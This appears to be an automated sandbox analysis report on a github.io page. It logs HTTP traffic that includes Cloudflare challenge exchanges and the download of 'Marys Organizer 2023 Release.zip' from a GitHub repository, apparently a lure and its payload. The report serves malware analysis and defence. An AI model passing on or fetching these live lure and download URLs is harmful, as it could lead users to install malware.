C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Windows Analysis Report
https://maveuve.github.io/frlpodf/marynewreleasefax.html

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:41 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:41 UTC	170	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:41 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8c8c7af59e801831-EWR
2024-09-25 16:44:41 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 40 08 02 00 00 00 ca c9 8d b7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRA@IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:41 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=E7m3O887TFWMntR&MD=kMUKRooF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-25 16:44:41 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 069fb382-7766-4e45-a7d2-050f0f2c4e0d MS-RequestId: c8131600-3cb6-4840-992e-d3b8fda6d9ad MS-CV: jTLqNgLBJEyhRklO.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 25 Sep 2024 16:44:40 GMT Connection: close Content-Length: 24490
2024-09-25 16:44:41 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-25 16:44:41 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:42 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:42 UTC	349	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 16:44:42 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: nY4+DH6ZBhG0Oqj/RFG0xMF8vFh5uwTGybA=$alOBOjM7O2DWM6MX cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8c8c7afcbc4542b9-EWR
2024-09-25 16:44:42 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:43 UTC	926	OUT	POST /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34688 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 596e5d08887dcbd sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:43 UTC	16384	OUT	Data Raw: 76 5f 38 63 38 63 37 61 64 38 63 39 36 39 34 31 61 36 3d 70 5a 6e 45 57 30 37 6f 51 4a 51 74 69 66 6c 47 61 47 53 4a 6e 74 78 37 32 47 75 45 69 49 35 58 37 72 47 53 52 63 6e 4e 6b 37 6d 74 74 47 70 45 37 54 63 6c 37 48 47 37 4c 47 37 6d 6b 37 55 47 54 63 6e 47 72 47 41 52 51 47 31 45 35 6b 47 52 55 42 38 6b 65 47 30 38 49 37 71 4b 25 32 62 6e 47 71 53 47 41 6e 37 62 54 24 74 74 4a 79 76 47 55 51 47 63 50 6c 24 4e 4f 4b 37 47 77 38 47 67 6c 6a 45 35 69 51 51 74 6d 47 74 67 6e 53 37 65 6e 47 48 45 47 78 30 72 65 32 65 30 49 77 47 41 5a 6e 4b 78 51 4c 69 44 66 44 47 37 6e 77 4b 45 41 4a 49 75 2b 53 6c 49 74 32 6f 66 47 53 58 45 47 53 47 6e 69 37 41 45 5a 58 47 4e 75 54 6c 4c 65 24 76 74 31 48 6f 47 30 67 65 61 6c 77 72 59 54 7a 74 4b 56 6c 6c 44 2b 39 44 6c Data Ascii: v_8c8c7ad8c96941a6=pZnEW07oQJQtiflGaGSJntx72GuEiI5X7rGSRcnNk7mttGpE7Tcl7HG7LG7mk7UGTcnGrGARQG1E5kGRUB8keG08I7qK%2bnGqSGAn7bT$ttJyvGUQGcPl$NOK7Gw8GgljE5iQQtmGtgnS7enGHEGx0re2e0IwGAZnKxQLiDfDG7nwKEAJIu+SlIt2ofGSXEGSGni7AEZXGNuTlLe$vt1HoG0gealwrYTztKVllD+9Dl
2024-09-25 16:44:43 UTC	16384	OUT	Data Raw: 74 35 66 53 74 37 63 41 47 74 47 6b 73 2b 67 47 47 37 6c 75 67 4b 47 6d 43 74 41 47 6c 49 47 47 35 64 2d 4e 69 6f 35 76 45 62 6e 6c 47 41 4d 4c 46 45 37 38 30 57 4c 64 47 2b 48 37 6c 49 65 47 6e 47 65 47 30 43 49 4b 38 37 47 68 41 47 54 47 66 49 47 6b 47 4e 41 74 6e 47 77 47 70 45 66 34 41 6a 47 54 45 47 6c 37 50 4f 67 51 74 38 47 77 47 2b 69 37 69 37 54 47 6c 62 31 5a 47 4c 47 4a 38 37 47 37 65 47 66 67 47 38 37 48 47 65 49 66 42 47 49 47 74 49 4e 42 47 64 47 4a 47 30 38 47 59 47 6f 38 41 58 47 51 47 4e 38 35 73 47 71 49 66 69 47 6e 47 73 47 46 45 70 41 37 78 47 67 51 4e 77 47 68 47 4a 53 66 73 64 64 38 59 4d 37 59 4b 75 49 66 69 74 6d 37 67 5a 66 49 4e 75 73 36 47 6f 4d 76 6c 37 43 45 6b 77 66 45 74 79 45 24 47 50 42 37 69 47 4b 47 4a 4d 37 6b 47 4f 47 Data Ascii: t5fSt7cAGtGks+gGG7lugKGmCtAGlIGG5d-Nio5vEbnlGAMLFE780WLdG+H7lIeGnGeG0CIK87GhAGTGfIGkGNAtnGwGpEf4AjGTEGl7POgQt8GwG+i7i7TGlb1ZGLGJ87G7eGfgG87HGeIfBGIGtINBGdGJG08GYGo8AXGQGN85sGqIfiGnGsGFEpA7xGgQNwGhGJSfsdd8YM7YKuIfitm7gZfINus6GoMvl7CEkwfEtyE$GPB7iGKGJM7kGOG
2024-09-25 16:44:43 UTC	1920	OUT	Data Raw: 69 37 39 72 51 6e 41 77 31 69 41 6d 7a 2b 51 47 5a 32 48 42 30 6e 37 6e 41 73 6d 62 38 37 55 47 53 46 4a 75 67 4a 47 61 41 66 53 78 6f 47 4e 76 77 55 79 69 39 47 5a 39 77 37 52 46 7a 24 72 32 4c 69 45 69 72 6b 4c 74 6e 41 78 38 37 30 59 4e 44 55 49 70 70 66 43 45 49 47 45 44 30 51 45 37 38 30 41 6a 45 5a 32 39 4b 78 45 47 35 52 6b 74 59 2b 47 6e 6e 6e 66 50 59 38 42 64 6a 45 69 47 6b 6e 49 56 47 36 57 77 45 49 49 37 45 46 77 47 65 49 5a 57 47 4b 45 41 32 70 66 77 4e 4d 6f 6a 58 52 47 39 57 4c 41 36 49 37 46 55 70 35 4e 45 46 50 55 62 39 2b 78 74 5a 34 58 77 53 75 72 52 30 62 79 66 41 47 49 4b 61 6c 74 4d 34 7a 48 2d 4c 53 53 51 6c 38 4a 72 66 70 77 73 49 71 41 74 69 47 30 47 70 4a 6e 5a 42 39 5a 53 45 41 6c 30 2b 61 61 39 52 58 37 4c 47 37 38 41 5a 73 42 Data Ascii: i79rQnAw1iAmz+QGZ2HB0n7nAsmb87UGSFJugJGaAfSxoGNvwUyi9GZ9w7RFz$r2LiEirkLtnAx870YNDUIppfCEIGED0QE780AjEZ29KxEG5RktY+GnnnfPY8BdjEiGknIVG6WwEII7EFwGeIZWGKEA2pfwNMojXRG9WLA6I7FUp5NEFPUb9+xtZ4XwSurR0byfAGIKaltM4zH-LSSQl8JrfpwsIqAtiG0GpJnZB9ZSEAl0+aa9RX7LG78AZsB
2024-09-25 16:44:43 UTC	1244	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4476 Connection: close cf-chl-out-s: uUwdi3JwD5me2BB2iURDKX9gyLtTgmfyGMtAn6PZ2C6xixWl1YKOMHrZUpu3eTDdPXMjsjOKQ0C1gqbeM+4m/txNOAkh9nu0bfgcpXWQV4jmsMM+MzagKQPaKRwuh7pFmEsnbHQASX8Rco4/xaCK2FpQ3duuUYKgXzKdIsIISyTvfmDfJBHW61Oqa3oaU3fh1UJptR4Xf+fYmbasjqnIQoXdiCe2AKH8NMfmdJFe5zLu1f3fFK/zbdcjveLUMowDnmEOERFALaQCP27Yg1cKTk9WG0NskQGRTjPTsQe4eJ9CyOuT0iK/v6SqyAQ0HmmV+vMTwFCRGVt+f1ABHGIkR+NwUw58d0roPe7f1HWFYF3SDA3zwSSfUEoVAZWQrN2uRlKDh2mIQ3lQkY22imdsa68d7OWvNsEDl9P86NNy0gbse7Nh2FVevMkvQyAYgqvLJ3VHqdolMcqOz7i5jCQJwpXjn0WceukTlHpcCquCVQvL7g4vxQ75vhj6JIumq7RvteEYy9m9h6NWPWTY3UCL3wlxXZjGvJ62Zd5UMdNMSOU0LltAhdYokef94+Kk2LhxYjcNxbDaVAHcL0D89EHHHQo7A+jYDJ8JffB8oEr+my+Jq4VVVSqvsOaebXIpL/ajvnxSFjZ1CtHBeeKnov53HOLyQasCA6k/brrPSA8UAdCDzXd14OVpqdoiH6HT3nvqwg4lphd3KVVHA16m6nt/kRp0c4kBaxQNByxjJDGvFmYq91ww39+3+1lkecPblkbox7Xs5CpeZjmI58FkrjZ1nDyddDisy3JPVGHkdC2+nJcjQG1RY3xRyy/HwaO/IflR26mWZxKXmSa7+YE6crwjHxkp39arFKZZ5soEJSyL/0m6milKD1GNIa6vaYqK36ZjQhCTaxv15YpNVkdnZxxBKmE5VbWIsmApVaJhP5cQCTFa/dh2ynLy68waR5zSL9ZBky5q0nhLn10XvTu1j6tV7fumgfPCyNBYuN4v26QF0B1rSzBpNs [TRUNCATED]
2024-09-25 16:44:43 UTC	203	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 58 51 45 52 30 6a 79 62 69 30 49 69 58 56 32 70 6c 31 52 53 7a 4d 43 4f 37 46 67 76 32 71 49 61 32 73 6b 32 59 45 74 6a 2b 6e 49 4f 6d 68 45 50 42 30 65 44 62 67 65 6b 66 39 67 42 50 54 64 76 55 58 53 7a 58 58 74 6c 4f 32 67 67 4d 50 2b 55 42 72 76 4d 48 57 67 6d 30 2f 39 32 41 32 6e 38 67 35 58 50 62 32 31 38 35 44 6f 6f 31 6b 57 37 4c 47 49 59 4f 69 45 3d 24 39 4c 62 58 6c 38 77 6b 4b 45 41 37 79 6b 4f 30 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 38 63 37 62 30 34 61 65 64 61 38 63 61 38 2d 45 57 52 0d 0a 0d 0a Data Ascii: cf-chl-out: XQER0jybi0IiXV2pl1RSzMCO7Fgv2qIa2sk2YEtj+nIOmhEPB0eDbgekf9gBPTdvUXSzXXtlO2ggMP+UBrvMHWgm0/92A2n8g5XPb2185Doo1kW7LGIYOiE=$9LbXl8wkKEA7ykO0Server: cloudflareCF-RAY: 8c8c7b04aeda8ca8-EWR
2024-09-25 16:44:43 UTC	1291	IN	Data Raw: 6c 49 65 33 74 61 35 35 6e 71 47 69 6b 5a 61 78 71 4b 69 38 73 72 72 4d 77 4a 61 6a 71 34 79 4b 71 63 61 74 79 35 47 77 7a 64 44 53 6d 37 66 4b 32 64 61 37 32 5a 58 51 30 72 4c 6e 6f 35 76 45 36 36 65 66 7a 75 54 45 37 64 76 70 78 74 44 46 34 38 62 73 78 38 7a 56 35 39 6a 4d 32 64 58 79 32 41 54 57 31 2f 72 48 39 76 37 55 34 77 76 49 7a 2f 30 4c 43 4e 2f 4c 43 51 77 47 44 68 45 44 43 75 6b 54 35 67 6a 37 38 52 67 55 41 75 55 51 43 51 62 6c 41 67 6b 4e 47 75 59 6f 43 51 6b 69 36 75 59 47 41 65 2f 34 4e 78 62 31 4b 52 55 76 43 69 77 4f 45 6a 73 5a 45 41 56 46 43 43 51 32 52 7a 59 41 42 55 6f 36 4b 41 74 43 50 53 70 55 49 43 6b 51 55 68 73 39 45 45 35 55 49 43 78 51 58 56 70 59 52 46 39 6c 49 47 73 6b 54 6c 67 6c 4f 6b 63 2b 52 46 35 77 4d 6e 4e 41 55 31 42 Data Ascii: lIe3ta55nqGikZaxqKi8srrMwJajq4yKqcaty5GwzdDSm7fK2da72ZXQ0rLno5vE66efzuTE7dvpxtDF48bsx8zV59jM2dXy2ATW1/rH9v7U4wvIz/0LCN/LCQwGDhEDCukT5gj78RgUAuUQCQblAgkNGuYoCQki6uYGAe/4Nxb1KRUvCiwOEjsZEAVFCCQ2RzYABUo6KAtCPSpUICkQUhs9EE5UICxQXVpYRF9lIGskTlglOkc+RF5wMnNAU1B
2024-09-25 16:44:43 UTC	1369	IN	Data Raw: 42 67 45 5a 38 63 34 4e 66 68 59 46 65 61 32 69 4f 5a 32 78 6e 6b 34 2b 4e 67 35 4a 62 64 33 61 5a 69 6e 4f 59 69 35 31 32 6d 71 46 36 61 61 53 6c 69 58 75 6f 6f 59 4f 44 6a 71 36 75 69 49 71 70 64 72 43 30 6f 33 74 32 73 61 65 64 6b 4a 4f 2b 67 4d 46 38 72 35 76 46 78 63 61 49 72 73 4f 33 6f 36 4f 51 78 72 53 53 74 74 62 52 6a 36 72 57 78 73 61 78 30 5a 2f 56 32 74 76 63 76 38 66 5a 75 73 50 67 36 74 57 2f 70 4f 6a 5a 75 75 62 71 72 65 48 77 38 72 54 4b 38 64 66 63 75 38 77 42 34 64 7a 54 42 64 58 35 2f 51 44 47 32 4e 66 6e 39 63 30 43 43 63 2f 71 36 77 6e 31 38 39 41 52 45 76 6a 70 48 65 2f 57 42 77 67 59 45 2f 45 6b 44 2f 59 41 47 76 6b 56 4a 43 54 70 43 41 6f 78 42 52 4d 6c 4c 53 33 74 4c 7a 67 7a 4a 76 51 31 45 44 6f 33 50 42 55 75 4b 7a 38 58 50 6b Data Ascii: BgEZ8c4NfhYFea2iOZ2xnk4+Ng5Jbd3aZinOYi512mqF6aaSliXuooYODjq6uiIqpdrC0o3t2saedkJO+gMF8r5vFxcaIrsO3o6OQxrSSttbRj6rWxsax0Z/V2tvcv8fZusPg6tW/pOjZuubqreHw8rTK8dfcu8wB4dzTBdX5/QDG2Nfn9c0CCc/q6wn189AREvjpHe/WBwgYE/EkD/YAGvkVJCTpCAoxBRMlLS3tLzgzJvQ1EDo3PBUuKz8XPk
2024-09-25 16:44:43 UTC	1369	IN	Data Raw: 61 56 78 71 61 55 35 67 61 6d 52 68 5a 70 4a 5a 55 47 71 47 61 59 36 4e 6a 59 71 50 6f 4a 74 65 6e 70 79 4a 65 36 53 6f 5a 34 4b 64 69 6f 6d 6a 6a 33 2b 30 6c 5a 43 46 75 4b 2b 6a 65 70 79 36 6e 61 36 2b 67 62 69 74 6f 59 32 64 68 37 61 68 71 35 65 59 71 62 61 42 77 4a 44 4a 6f 64 48 54 69 4b 7a 48 30 70 69 6d 79 72 48 51 72 37 6e 62 32 62 6d 38 6f 62 61 35 36 4c 58 49 6e 64 37 42 32 73 62 67 30 4b 37 4e 34 66 4f 7a 7a 2b 6d 76 39 38 75 79 33 64 37 61 32 2f 66 5a 7a 39 44 30 31 74 6e 35 31 4d 6e 67 2f 51 50 4a 35 67 4c 4d 2f 75 73 43 7a 65 6a 69 43 74 54 77 38 51 2f 71 35 74 45 51 34 42 76 33 37 78 6e 7a 32 52 67 47 49 39 30 64 36 4f 77 49 44 50 6f 48 44 76 34 33 39 42 49 35 4f 43 34 55 43 53 6b 50 47 78 77 69 41 52 51 63 4d 77 66 35 53 6a 63 45 48 45 77 Data Ascii: aVxqaU5gamRhZpJZUGqGaY6NjYqPoJtenpyJe6SoZ4Kdiomjj3+0lZCFuK+jepy6na6+gbitoY2dh7ahq5eYqbaBwJDJodHTiKzH0pimyrHQr7nb2bm8oba56LXInd7B2sbg0K7N4fOzz+mv98uy3d7a2/fZz9D01tn51Mng/QPJ5gLM/usCzejiCtTw8Q/q5tEQ4Bv37xnz2RgGI90d6OwIDPoHDv439BI5OC4UCSkPGxwiARQcMwf5SjcEHEw
2024-09-25 16:44:43 UTC	447	IN	Data Raw: 49 39 50 61 70 64 54 56 6d 36 4d 65 58 5a 56 61 6f 2b 58 64 6f 42 35 66 48 35 65 59 49 42 2b 68 36 70 71 5a 59 79 4e 66 6e 39 39 62 59 47 4c 68 4b 61 32 69 35 4f 64 73 4a 43 61 74 6f 4b 51 6e 61 57 42 6e 6e 2b 59 67 36 4b 2b 70 49 71 63 7a 71 71 69 69 61 75 32 70 34 32 30 32 70 61 31 7a 73 37 62 75 4a 62 4d 73 72 33 41 30 4c 57 6c 32 74 71 6f 6f 64 6d 6e 71 61 47 38 34 71 37 4d 71 2b 61 76 30 65 58 75 75 4b 32 79 36 72 65 78 33 50 7a 56 75 66 43 37 77 4c 6d 2f 42 64 7a 6b 77 73 66 4f 78 66 33 2b 30 75 33 4b 7a 65 62 78 7a 74 48 70 32 39 4d 4e 38 50 6b 65 32 2b 4c 5a 38 42 58 33 34 67 67 6e 46 78 76 31 34 77 2f 33 47 66 76 75 4c 53 34 49 44 6a 51 78 42 69 34 54 39 42 55 48 4b 77 41 4c 2f 45 54 2b 4f 51 5a 47 47 44 63 55 54 45 63 64 49 31 41 77 52 79 56 46 Data Ascii: I9PapdTVm6MeXZVao+XdoB5fH5eYIB+h6pqZYyNfn99bYGLhKa2i5OdsJCatoKQnaWBnn+Yg6K+pIqczqqiiau2p4202pa1zs7buJbMsr3A0LWl2tqoodmnqaG84q7Mq+av0eXuuK2y6rex3PzVufC7wLm/BdzkwsfOxf3+0u3KzebxztHp29MN8Pke2+LZ8BX34ggnFxv14w/3GfvuLS4IDjQxBi4T9BUHKwAL/ET+OQZGGDcUTEcdI1AwRyVF

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:44 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:44 UTC	349	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 16:44:44 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: yzYdkmFQqIKp4n/d8ojQnwwKrZsIgtD8TRU=$KqvhZj5kqJ9sfX1R Server: cloudflare CF-RAY: 8c8c7b098cfe0f63-EWR
2024-09-25 16:44:44 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:44 UTC	768	OUT	GET /maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1 Host: github.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:44 UTC	583	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 25 Sep 2024 16:44:44 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-09-25 16:44:44 UTC	3380	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:45 UTC	779	OUT	GET /maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1 Host: raw.githubusercontent.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:45 UTC	895	IN	HTTP/1.1 200 OK Connection: close Content-Length: 66873356 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "978bf715d601a0ab2162d84d782d347e8ae150989a438a765c90771c3b05f65d" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 8580:16FC:147A61F:163F2B3:66F43DFD Accept-Ranges: bytes Date: Wed, 25 Sep 2024 16:44:45 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740035-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727282685.488602,VS0,VE241 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 63530d284cb844161806c6aebc1f89ec021f7fb2 Expires: Wed, 25 Sep 2024 16:49:45 GMT Source-Age: 0
